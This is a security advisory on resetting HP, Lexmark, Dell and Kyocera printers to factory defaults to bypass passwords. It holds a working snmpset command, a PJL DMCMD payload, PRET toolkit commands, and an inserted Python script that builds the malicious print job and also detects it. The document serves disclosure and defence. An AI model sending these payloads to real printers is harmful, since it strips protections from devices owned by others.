Hacking Printers Advisory 5
Posted Jan 31, 2017
Authored by Jens Mueller

This post is about resetting a printer to factory defaults through ordinary print jobs, thereby bypassing all protection mechanisms such as user-set passwords.

tags | advisory
SHA-256 | c0d3ac08f94bc071adf9e63784f30829f42fad0694c4e352f9eb78b9c01cd3f8

TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 5 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
resetting a printer to factory defaults through ordinary print jobs,
thereby bypassing all protection mechanisms such as user-set passwords.
The attack can be performed by anyone who can print, for example through
USB or the network. It can even be carried out by a malicious website,
using cross-site printing techniques (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

========================[ Factory Defaults ]==========================

-------------------------[ Affected Devices ]-------------------------

This vulnerability has been verified for the devices listed below:

- HP LaserJet 4200N (Firmware version: 20050602): PML-based attack
- HP LaserJet 4250N (Firmware version: 20150130): PML-based attack
- HP LaserJet P2015dn (Firmware version: 20070221): PML-based attack
- HP LaserJet M2727nfs (Firmware version: 20140702): PML-based attack
- HP LaserJet 3392 AiO (Firmware version: 20120925): PML-based attack
- HP LaserJet CP1515n (Firmware version: 20120110): PML-based attack
- Lexmark X264dn (Firmware version: NR.APS.N645): SNMP only
- Lexmark E360dn (Firmware version: NR.APS.N645): SNMP only
- Lexmark C736dn (Firmware version: NR.APS.N644): SNMP only
- Dell 1720n (Firmware version: NM.NA.N099): SNMP only
- Kyocera FS-C5200DN (Firmware version: 2011.05.16): SNMP only

Further HP printers are likely to be affected.
Vendor informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The `Printer-MIB' (RFC 3805) defines the prtGeneralReset object (OID
1.3.6.1.2.1.43.5.1.1.3.1). Setting it to resetToFactoryDefaults(6) via
SNMP (port 161/udp) restores the device's factory defaults. This is a
legitimate management feature, but an attacker can also use it to
remove/bypass protection mechanisms such as user-set passwords for the
embedded web server, PJL and PostScript if the default/public SNMP
community string has not been changed (SNMPv1/v2c write access is
authenticated by the community string alone):

----------------------------------------------------------------------
snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
----------------------------------------------------------------------

In many scenarios an attacker is not able to perform SNMP requests
because of firewalls or unknown SNMP community strings. On HP devices,
however, she can translate the SNMP request into its PML (Printer
Management Language) representation and embed it within a legitimate
print job using the PJL DMCMD command:

----------------------------------------------------------------------
@PJL DMCMD ASCIIHEX="040006020501010301040106"
----------------------------------------------------------------------

This way, anyone who can print can reset the device to factory defaults
and thereby remove any protection mechanisms.
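To make the SNMP-to-PML translation concrete, and to give defenders a way to spot such a request in a spooled job, here is an added example (not code from the advisory or from PRET). It assumes the PML layout that the request above implies and that HP's PML documentation describes: a leading request-type byte (0x04 = SetRequest) followed by type/length/value triples, where type 0x00 is an object identifier, type 0x04 an enumeration, and the Printer-MIB prefix 1.3.6.1.2.1.43 is compressed to the single sub-identifier 2. The UEL/PJL job framing is standard PJL; the sample jobs are constructed here.

```python
import re

# Printer-MIB (RFC 3805) prefix and the PML compression of it.
# Assumption: PML represents 1.3.6.1.2.1.43 as the single sub-identifier 2
# (inferred from the DMCMD request shown in the advisory).
PRINTER_MIB_PREFIX = "1.3.6.1.2.1.43"
PML_PRINTER_MIB = 2

# PML request type and data type codes (assumption based on HP PML docs).
PML_SET_REQUEST = 0x04
PML_TYPE_OID = 0x00
PML_TYPE_ENUM = 0x04

UEL = b"\x1b%-12345X"  # PJL Universal Exit Language sequence
PRT_GENERAL_RESET = "1.3.6.1.2.1.43.5.1.1.3.1"
RESET_TO_FACTORY_DEFAULTS = 6  # PrtGeneralResetTC value from RFC 3805


def oid_to_pml(oid: str) -> bytes:
    """Compress a Printer-MIB OID (dotted string) into PML sub-identifier bytes."""
    if not oid.startswith(PRINTER_MIB_PREFIX + "."):
        raise ValueError("only Printer-MIB OIDs are handled in this example")
    rest = [int(x) for x in oid[len(PRINTER_MIB_PREFIX) + 1:].split(".")]
    subids = [PML_PRINTER_MIB] + rest
    if any(s > 0x7F for s in subids):
        raise ValueError("multi-byte sub-identifiers are not handled here")
    return bytes(subids)


def pml_set_request(oid: str, enum_value: int) -> bytes:
    """Build a PML SetRequest that assigns an enumeration value to an OID."""
    oid_bytes = oid_to_pml(oid)
    header = bytes([PML_SET_REQUEST, PML_TYPE_OID, len(oid_bytes)])
    value = bytes([PML_TYPE_ENUM, 1, enum_value])
    return header + oid_bytes + value


def pjl_dmcmd(request: bytes) -> str:
    """Wrap a raw PML request in the PJL DMCMD command, hex encoded."""
    return '@PJL DMCMD ASCIIHEX="%s"' % request.hex()


def build_job(commands) -> bytes:
    """Frame PJL commands as a complete print job: UEL, @PJL, commands, UEL."""
    body = "\r\n".join(commands) + "\r\n"
    return UEL + b"@PJL\r\n" + body.encode("ascii") + UEL


# ---- defender side: decode DMCMD payloads found in a spooled job ----------
DMCMD_RE = re.compile(rb'@PJL\s+DMCMD\s+ASCIIHEX\s*=\s*"([0-9A-Fa-f]+)"', re.I)


def decode_set_request(request: bytes):
    """Parse a PML SetRequest of an enumeration; return (oid, value) or None."""
    if len(request) < 3 or request[0] != PML_SET_REQUEST:
        return None
    if request[1] != PML_TYPE_OID:
        return None
    n = request[2]
    oid_bytes = request[3:3 + n]
    if len(oid_bytes) != n or not oid_bytes or oid_bytes[0] != PML_PRINTER_MIB:
        return None
    oid = PRINTER_MIB_PREFIX + "".join("." + str(b) for b in oid_bytes[1:])
    value = request[3 + n:]
    if len(value) < 2 or value[0] != PML_TYPE_ENUM:
        return None
    length = value[1]
    data = value[2:2 + length]
    if len(data) != length:
        return None
    return oid, int.from_bytes(data, "big")


def find_factory_resets(job: bytes):
    """Return the hex payload of every DMCMD in a job that sets prtGeneralReset to 6."""
    hits = []
    for m in DMCMD_RE.finditer(job):
        decoded = decode_set_request(bytes.fromhex(m.group(1).decode()))
        if decoded == (PRT_GENERAL_RESET, RESET_TO_FACTORY_DEFAULTS):
            hits.append(m.group(1).decode())
    return hits


if __name__ == "__main__":
    # Constructed sample: a job carrying the reset, and a harmless status query.
    reset_job = build_job([pjl_dmcmd(pml_set_request(PRT_GENERAL_RESET, 6))])
    benign_job = build_job(["@PJL INFO STATUS"])
    print(reset_job)
    print("factory resets found:", find_factory_resets(reset_job))
    print("factory resets found:", find_factory_resets(benign_job))
```

The encoder reproduces the exact DMCMD string from the advisory, which is the check that the assumed byte layout is right; the decoder side is what a print-server or spooler filter would run over incoming jobs before handing them to an HP device.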

-------------------------[ Proof of Concept ]-------------------------

A Python-based proof-of-concept tool called Printer Exploitation
Toolkit (PRET) has been published. The attack can be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> reset

Note that if your printer does not restart and restore factory defaults,
it may still be vulnerable to SNMP based attacks as mentioned above.

-----------------------[ Further Information ]------------------------

Information on this bug/feature of SNMP and PML can be found at:
http://hacking-printers.net/wiki/index.php/Factory_defaults
https://tools.ietf.org/html/rfc3805

